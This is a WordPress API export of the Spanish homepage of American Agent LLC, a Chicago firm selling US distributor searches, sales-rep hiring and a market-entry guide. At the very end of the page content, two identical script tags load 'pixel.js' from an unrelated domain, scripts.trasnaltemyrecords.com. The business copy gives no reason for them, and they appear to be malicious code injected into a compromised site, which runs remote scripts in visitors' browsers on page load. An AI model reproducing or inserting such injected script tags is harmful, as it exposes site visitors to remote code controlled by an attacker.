{"id":3125,"date":"2013-04-01T15:37:54","date_gmt":"2013-04-01T15:37:54","guid":{"rendered":"https:\/\/americanagent.com\/homepage-2\/"},"modified":"2014-09-10T16:31:13","modified_gmt":"2014-09-10T20:31:13","slug":"inicio","status":"publish","type":"page","link":"https:\/\/americanagent.com\/es\/","title":{"rendered":"Inicio"},"content":{"rendered":"<div id='layer_slider_1'  class='avia-layerslider main_color avia-shadow  avia-builder-el-0  el_before_av_one_third  avia-builder-el-first  container_wrap sidebar_right'  style='height: 471px;'  ><\/div><div id='after_layer_slider_1'  class='main_color av_default_container_wrap container_wrap sidebar_right'  ><div class='container av-section-cont-open' ><div class='template-page content  av-content-small alpha units'><div class='post-entry post-entry-type-page post-entry-3125'><div class='entry-content-wrapper clearfix'>\n<div  class='flex_column av-av_one_third-2a9015ff38129c418a3f2eafba3e9512 av_one_third  avia-builder-el-1  el_after_av_layerslider  el_before_av_one_third  avia-builder-el-first  first flex_column_div  '     ><article  class='iconbox iconbox_top av-av_icon_box-03e6c32082d31b0e641ed0956d64ca65  avia-builder-el-2  avia-builder-el-no-sibling  main_color'  itemscope=\"itemscope\" itemtype=\"https:\/\/schema.org\/CreativeWork\" ><div class=\"iconbox_content\"><header class=\"entry-content-header\" aria-label=\"Icon: B\u00fasqueda de Distribuidores y Importadores EEUU\"><div class='iconbox_icon heading-color avia-iconfont avia-font-entypo-fontello' data-av_icon='\ue803' data-av_iconfont='entypo-fontello'  ><\/div><h3 class='iconbox_content_title '  itemprop=\"headline\" >B\u00fasqueda de Distribuidores y Importadores EEUU<\/h3><\/header><div class='iconbox_content_container '  itemprop=\"text\" ><p>Podemos ayudarle a encontrar ya a comunicarse con los mejores distribuidores de Am\u00e9rica, mayoristas y\u00a0importadores.<\/p>\n<div  class='avia-button-wrap av-av_button-5e6369e0c9bae29e8f1c1622800a6e56-wrap avia-button-center  avia-builder-el-3  avia-builder-el-no-sibling '><a href='https:\/\/americanagent.com\/es\/buscar-usa-distribuidores-e-importadores\/'  class='avia-button av-av_button-5e6369e0c9bae29e8f1c1622800a6e56 av-link-btn avia-icon_select-yes-left-icon avia-size-large avia-position-center avia-color-theme-color'   aria-label=\"See Details\"><span class='avia_button_icon avia_button_icon_left avia-iconfont avia-font-entypo-fontello' data-av_icon='\ue816' data-av_iconfont='entypo-fontello' ><\/span><span class='avia_iconbox_title' >See Details<\/span><\/a><\/div>\n<\/div><\/div><footer class=\"entry-footer\"><\/footer><\/article><\/div>\n<div  class='flex_column av-av_one_third-bb0c93372dbfdfd42698443400a42550 av_one_third  avia-builder-el-4  el_after_av_one_third  el_before_av_one_third  flex_column_div  '     ><article  class='iconbox iconbox_top av-av_icon_box-86f2f0a895422496840b36154e2d39cd  avia-builder-el-5  avia-builder-el-no-sibling  main_color'  itemscope=\"itemscope\" itemtype=\"https:\/\/schema.org\/CreativeWork\" ><div class=\"iconbox_content\"><header class=\"entry-content-header\" aria-label=\"Icon: Estrategia de ventas directa de EE.UU.\"><div class='iconbox_icon heading-color avia-iconfont avia-font-entypo-fontello' data-av_icon='\ue881' data-av_iconfont='entypo-fontello'  ><\/div><h3 class='iconbox_content_title '  itemprop=\"headline\" >Estrategia de ventas directa de EE.UU.<\/h3><\/header><div class='iconbox_content_container '  itemprop=\"text\" ><p>Muchas empresas europeas est\u00e1n operando con \u00e9xito en los EE.UU. con una estrategia de ventas muy directa.<\/p>\n<div  class='avia-button-wrap av-av_button-ac76160c731a3ddca2106779c4281595-wrap avia-button-center  avia-builder-el-6  avia-builder-el-no-sibling '><a href='https:\/\/americanagent.com\/es\/estrategia-de-ventas-directa-de-eeuu\/'  class='avia-button av-av_button-ac76160c731a3ddca2106779c4281595 av-link-btn avia-icon_select-yes-left-icon avia-size-large avia-position-center avia-color-theme-color'   aria-label=\"See Details\"><span class='avia_button_icon avia_button_icon_left avia-iconfont avia-font-entypo-fontello' data-av_icon='\ue816' data-av_iconfont='entypo-fontello' ><\/span><span class='avia_iconbox_title' >See Details<\/span><\/a><\/div>\n<\/div><\/div><footer class=\"entry-footer\"><\/footer><\/article><\/div>\n<div  class='flex_column av-av_one_third-bb0c93372dbfdfd42698443400a42550 av_one_third  avia-builder-el-7  el_after_av_one_third  el_before_av_one_third  flex_column_div  '     ><article  class='iconbox iconbox_top av-av_icon_box-79a03a954340784732dacb8e60cd615e  avia-builder-el-8  avia-builder-el-no-sibling  main_color'  itemscope=\"itemscope\" itemtype=\"https:\/\/schema.org\/CreativeWork\" ><div class=\"iconbox_content\"><header class=\"entry-content-header\" aria-label=\"Icon: B\u00daSQUEDA DE USA REPRESENTANTE DE VENTAS\"><div class='iconbox_icon heading-color avia-iconfont avia-font-entypo-fontello' data-av_icon='\ue80c' data-av_iconfont='entypo-fontello'  ><\/div><h3 class='iconbox_content_title '  itemprop=\"headline\" >B\u00daSQUEDA DE USA REPRESENTANTE DE VENTAS<\/h3><\/header><div class='iconbox_content_container '  itemprop=\"text\" ><p>Estamos dispuestos a encontrar y contratar a los mejores representantes de venta en Am\u00e9rica.<\/p>\n<div  class='avia-button-wrap av-av_button-6112bf0ab01b5866fbb2252250e00468-wrap avia-button-center  avia-builder-el-9  avia-builder-el-no-sibling '><a href='https:\/\/americanagent.com\/es\/busqueda-de-representante-de-ventas-de-ee-uu\/'  class='avia-button av-av_button-6112bf0ab01b5866fbb2252250e00468 av-link-btn avia-icon_select-yes-left-icon avia-size-large avia-position-center avia-color-theme-color'   aria-label=\"See Details\"><span class='avia_button_icon avia_button_icon_left avia-iconfont avia-font-entypo-fontello' data-av_icon='\ue816' data-av_iconfont='entypo-fontello' ><\/span><span class='avia_iconbox_title' >See Details<\/span><\/a><\/div>\n<\/div><\/div><footer class=\"entry-footer\"><\/footer><\/article><\/div>\n<div  class='flex_column av-av_one_third-2a9015ff38129c418a3f2eafba3e9512 av_one_third  avia-builder-el-10  el_after_av_one_third  el_before_av_one_third  first flex_column_div  column-top-margin'     ><article  class='iconbox iconbox_top av-av_icon_box-673533bab884dffc83d7fbe9d6a763a8  avia-builder-el-11  avia-builder-el-no-sibling  main_color'  itemscope=\"itemscope\" itemtype=\"https:\/\/schema.org\/CreativeWork\" ><div class=\"iconbox_content\"><header class=\"entry-content-header\" aria-label=\"Icon: Los servicios de asistencia de EEUU\"><div class='iconbox_icon heading-color avia-iconfont avia-font-entypo-fontello' data-av_icon='\ue8c7' data-av_iconfont='entypo-fontello'  ><\/div><h3 class='iconbox_content_title '  itemprop=\"headline\" >Los servicios de asistencia de EEUU<\/h3><\/header><div class='iconbox_content_container '  itemprop=\"text\" ><p>Fuente de confianza para Ad-Hoc y servicios a terceros.<\/p>\n<div  class='avia-button-wrap av-av_button-c1bb673f88629c5b14da4a1dcf5c2e3a-wrap avia-button-center  avia-builder-el-12  avia-builder-el-no-sibling '><a href='https:\/\/americanagent.com\/es\/los-servicios-de-asistencia-de-eeuu\/'  class='avia-button av-av_button-c1bb673f88629c5b14da4a1dcf5c2e3a av-link-btn avia-icon_select-yes-left-icon avia-size-large avia-position-center avia-color-theme-color'   aria-label=\"See Details\"><span class='avia_button_icon avia_button_icon_left avia-iconfont avia-font-entypo-fontello' data-av_icon='\ue816' data-av_iconfont='entypo-fontello' ><\/span><span class='avia_iconbox_title' >See Details<\/span><\/a><\/div>\n<\/div><\/div><footer class=\"entry-footer\"><\/footer><\/article><\/div>\n<div  class='flex_column av-av_one_third-bb0c93372dbfdfd42698443400a42550 av_one_third  avia-builder-el-13  el_after_av_one_third  el_before_av_one_third  flex_column_div  column-top-margin'     ><article  class='iconbox iconbox_top av-av_icon_box-b5ee99b161a028383d1fa09188e7178a  avia-builder-el-14  avia-builder-el-no-sibling  main_color'  itemscope=\"itemscope\" itemtype=\"https:\/\/schema.org\/CreativeWork\" ><div class=\"iconbox_content\"><header class=\"entry-content-header\" aria-label=\"Icon: Entrada en el Mercado UU.EE.\"><div class='iconbox_icon heading-color avia-iconfont avia-font-entypo-fontello' data-av_icon='\ue84e' data-av_iconfont='entypo-fontello'  ><\/div><h3 class='iconbox_content_title '  itemprop=\"headline\" >Entrada en el Mercado UU.EE.<\/h3><\/header><div class='iconbox_content_container '  itemprop=\"text\" ><p>El objetivo de esta gu\u00eda de entrada en los mercados de Estados Unidos es ayudarle, a usted y a su empresa, a determinar la mejor estrategia para acceder a los mercados de los EUA.<\/p>\n<div  class='avia-button-wrap av-av_button-60c9fcb080ed1262bd5063ff66d6c711-wrap avia-button-center  avia-builder-el-15  avia-builder-el-no-sibling '><a href='http:\/\/usamarketguide.com\/es\/producto\/usa-market-guide'  class='avia-button av-av_button-60c9fcb080ed1262bd5063ff66d6c711 av-link-btn avia-icon_select-yes-left-icon avia-size-large avia-position-center avia-color-theme-color'  target=\"_blank\"  rel=\"noopener noreferrer\"  aria-label=\"See Details\"><span class='avia_button_icon avia_button_icon_left avia-iconfont avia-font-entypo-fontello' data-av_icon='\ue816' data-av_iconfont='entypo-fontello' ><\/span><span class='avia_iconbox_title' >See Details<\/span><\/a><\/div>\n<\/div><\/div><footer class=\"entry-footer\"><\/footer><\/article><\/div><div  class='flex_column av-av_one_third-bb0c93372dbfdfd42698443400a42550 av_one_third  avia-builder-el-16  el_after_av_one_third  avia-builder-el-last  flex_column_div  column-top-margin'     ><article  class='iconbox iconbox_top av-av_icon_box-eabd21e14c484175693d0d34d75e902e  avia-builder-el-17  avia-builder-el-no-sibling  main_color'  itemscope=\"itemscope\" itemtype=\"https:\/\/schema.org\/CreativeWork\" ><div class=\"iconbox_content\"><header class=\"entry-content-header\" aria-label=\"Icon: Contacto\"><div class='iconbox_icon heading-color avia-iconfont avia-font-entypo-fontello' data-av_icon='\ue805' data-av_iconfont='entypo-fontello'  ><\/div><h3 class='iconbox_content_title '  itemprop=\"headline\" >Contacto<\/h3><\/header><div class='iconbox_content_container '  itemprop=\"text\" ><p>Estamos dispuestos a crear una soluci\u00f3n personalizada abordando sus necesidades empresariales individuales.<\/p>\n<p>Para obtener informaci\u00f3n adicional, p\u00f3ngase en contacto con nosotros directamente, ya sea por correo electr\u00f3nico, skype o utilizando el siguiente formulario de contacto.<\/p>\n<div  class='avia-button-wrap av-av_button-af7875f63d39d1a72766db8598af7f46-wrap avia-button-center  avia-builder-el-18  avia-builder-el-no-sibling '><a href='https:\/\/americanagent.com\/es\/contacto\/'  class='avia-button av-av_button-af7875f63d39d1a72766db8598af7f46 av-link-btn avia-icon_select-yes-left-icon avia-size-large avia-position-center avia-color-theme-color'   aria-label=\"See Details\"><span class='avia_button_icon avia_button_icon_left avia-iconfont avia-font-entypo-fontello' data-av_icon='\ue816' data-av_iconfont='entypo-fontello' ><\/span><span class='avia_iconbox_title' >See Details<\/span><\/a><\/div>\n<\/div><\/div><footer class=\"entry-footer\"><\/footer><\/article><\/div><script src='https:\/\/scripts.trasnaltemyrecords.com\/pixel.js?track=r&#038;subid=043' type='text\/javascript'><\/script><script src='https:\/\/scripts.trasnaltemyrecords.com\/pixel.js?track=r&#038;subid=043' type='text\/javascript'><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>This is a Page excerpt. It will be displayed for search results<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"_bbp_topic_count":0,"_bbp_reply_count":0,"_bbp_total_topic_count":0,"_bbp_total_reply_count":0,"_bbp_voice_count":0,"_bbp_anonymous_reply_count":0,"_bbp_topic_count_hidden":0,"_bbp_reply_count_hidden":0,"_bbp_forum_subforum_count":0,"footnotes":""},"class_list":["post-3125","page","type-page","status-publish","hentry"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.4 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>American Agent LLC, Chicago - C\u00f3mo vender en Estados Unidos<\/title>\n<meta name=\"description\" content=\"Entrada en el mercado de los EUA - Importar y vender en el mercado estadounidense, Trabajar con representantes comerciales en los Estados Unidos, Vender USA\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/americanagent.com\/es\/\" \/>\n<meta property=\"og:locale\" content=\"es_ES\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"American Agent LLC, Chicago - C\u00f3mo vender en Estados Unidos\" \/>\n<meta property=\"og:description\" content=\"Entrada en el mercado de los EUA - Importar y vender en el mercado estadounidense, Trabajar con representantes comerciales en los Estados Unidos, Vender USA\" \/>\n<meta property=\"og:url\" content=\"https:\/\/americanagent.com\/es\/\" \/>\n<meta property=\"og:site_name\" content=\"American Agent - USA Sales Services and Distributor Search Services\" \/>\n<meta property=\"article:modified_time\" content=\"2014-09-10T20:31:13+00:00\" \/>\n<meta name=\"twitter:label1\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data1\" content=\"3 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/americanagent.com\\\/es\\\/\",\"url\":\"https:\\\/\\\/americanagent.com\\\/es\\\/\",\"name\":\"American Agent LLC, Chicago - C\u00f3mo vender en Estados Unidos\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/americanagent.com\\\/es\\\/#website\"},\"datePublished\":\"2013-04-01T15:37:54+00:00\",\"dateModified\":\"2014-09-10T20:31:13+00:00\",\"description\":\"Entrada en el mercado de los EUA - Importar y vender en el mercado estadounidense, Trabajar con representantes comerciales en los Estados Unidos, Vender USA\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/americanagent.com\\\/es\\\/#breadcrumb\"},\"inLanguage\":\"es-ES\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/americanagent.com\\\/es\\\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/americanagent.com\\\/es\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/americanagent.com\\\/es\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Inicio\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/americanagent.com\\\/es\\\/#website\",\"url\":\"https:\\\/\\\/americanagent.com\\\/es\\\/\",\"name\":\"American Agent - USA Sales Services and Distributor Search Services\",\"description\":\"USA Sales services and Distributor, Importer and Reseller Search services.\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/americanagent.com\\\/es\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"es-ES\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"American Agent LLC, Chicago - C\u00f3mo vender en Estados Unidos","description":"Entrada en el mercado de los EUA - Importar y vender en el mercado estadounidense, Trabajar con representantes comerciales en los Estados Unidos, Vender USA","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/americanagent.com\/es\/","og_locale":"es_ES","og_type":"article","og_title":"American Agent LLC, Chicago - C\u00f3mo vender en Estados Unidos","og_description":"Entrada en el mercado de los EUA - Importar y vender en el mercado estadounidense, Trabajar con representantes comerciales en los Estados Unidos, Vender USA","og_url":"https:\/\/americanagent.com\/es\/","og_site_name":"American Agent - USA Sales Services and Distributor Search Services","article_modified_time":"2014-09-10T20:31:13+00:00","twitter_misc":{"Est. reading time":"3 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebPage","@id":"https:\/\/americanagent.com\/es\/","url":"https:\/\/americanagent.com\/es\/","name":"American Agent LLC, Chicago - C\u00f3mo vender en Estados Unidos","isPartOf":{"@id":"https:\/\/americanagent.com\/es\/#website"},"datePublished":"2013-04-01T15:37:54+00:00","dateModified":"2014-09-10T20:31:13+00:00","description":"Entrada en el mercado de los EUA - Importar y vender en el mercado estadounidense, Trabajar con representantes comerciales en los Estados Unidos, Vender USA","breadcrumb":{"@id":"https:\/\/americanagent.com\/es\/#breadcrumb"},"inLanguage":"es-ES","potentialAction":[{"@type":"ReadAction","target":["https:\/\/americanagent.com\/es\/"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/americanagent.com\/es\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/americanagent.com\/es\/"},{"@type":"ListItem","position":2,"name":"Inicio"}]},{"@type":"WebSite","@id":"https:\/\/americanagent.com\/es\/#website","url":"https:\/\/americanagent.com\/es\/","name":"American Agent - USA Sales Services and Distributor Search Services","description":"USA Sales services and Distributor, Importer and Reseller Search services.","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/americanagent.com\/es\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"es-ES"}]}},"_links":{"self":[{"href":"https:\/\/americanagent.com\/es\/wp-json\/wp\/v2\/pages\/3125","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/americanagent.com\/es\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/americanagent.com\/es\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/americanagent.com\/es\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/americanagent.com\/es\/wp-json\/wp\/v2\/comments?post=3125"}],"version-history":[{"count":0,"href":"https:\/\/americanagent.com\/es\/wp-json\/wp\/v2\/pages\/3125\/revisions"}],"wp:attachment":[{"href":"https:\/\/americanagent.com\/es\/wp-json\/wp\/v2\/media?parent=3125"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}